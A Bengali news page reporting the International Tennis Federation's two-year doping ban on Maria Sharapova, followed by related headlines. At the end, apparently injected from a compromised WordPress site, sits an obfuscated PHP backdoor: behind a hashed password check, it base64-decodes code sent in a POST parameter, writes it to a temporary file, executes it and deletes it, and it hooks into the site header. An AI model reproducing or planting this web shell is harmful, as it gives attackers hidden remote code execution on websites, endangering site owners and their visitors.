বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

দুই বছর নিষিদ্ধ শারাপোভা

saraস্পোর্টস ডেস্ক : ডোপ টেস্টে ‘পজিটিভ’ হয়ে মার্চ থেকেই সাময়িক নিষিদ্ধ ছিলেন। আরও দুই বছর নিষিদ্ধই থাকতে হচ্ছে মারিয়া শারাপোভাকে। কাল এক বিবৃতিতে ইন্টারন্যাশনাল টেনিস ফেডারেশন (আইটিএফ) শারাপোভাকে দুই বছরের জন্য নিষিদ্ধ করার সিদ্ধান্তের কথা জানিয়েছে।

গত জানুয়ারিতে অস্ট্রেলিয়ান ওপেন চলার সময়ে ডোপ টেস্ট হয়েছিল শারাপোভার। এই বছরেরই ১ জানুয়ারি থেকে নিষিদ্ধ ঘোষিত মেলডোনিয়ামের উপস্থিতি পাওয়া গিয়েছিল তাঁর শরীরে। গত মার্চে ডোপ টেস্টের ফল জানার পর শারাপোভা নিজেই সংবাদ সম্মেলনে প্রথম জানিয়েছিলেন খবরটি। সাময়িক নিষিদ্ধ তিনি সেদিন থেকেই। চার বছর পর্যন্ত নিষিদ্ধ হতে পারেন বলে শোনা যাচ্ছিল।

তবে চার বছর নয়, আজ আইটিএফ জানিয়েছে নিষেধাজ্ঞাটা দুই বছর, যেটি শুরু হচ্ছে ডোপ টেস্টের তারিখ ২৬ জানুয়ারি থেকে। নিষেধাজ্ঞা শেষ হবে ২০১৮ সালের ২৫ জানুয়ারি। তবে ফেসবুকে নিজের ফ্যান পেজে দেওয়া প্রতিক্রিয়ায় এই রায়কে ‘অন্যায়রকম বেশি শাস্তি’ জানিয়ে শারাপোভা লিখেছেন, এই শাস্তির বিরুদ্ধে তিনি লুজানের আন্তর্জাতিক ক্রীড়া আদালতে আপিল করবেন। ২৯ বছর বয়সী শারাপোভা ৫টি গ্র্যান্ড স্লাম শিরোপা জিতেছেন। খেলার সঙ্গে গ্ল্যামার যোগ হয়ে তিনি পরিণত হয়েছিলেন টেনিসের সবচেয়ে জনপ্রিয় তারকায়। নিষিদ্ধ হওয়ার আগ পর্যন্ত টানা এগারো বছর আয়ের দিক থেকে শারাপোভা ছিলেন বিশ্বের নারী ক্রীড়াবিদদের মধ্যে শীর্ষে। সূত্র: এএফপি।

এ জাতীয় আরও খবর

রোহিঙ্গা ক্যাম্পে পাহাড়ধসে নিহত ৯

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}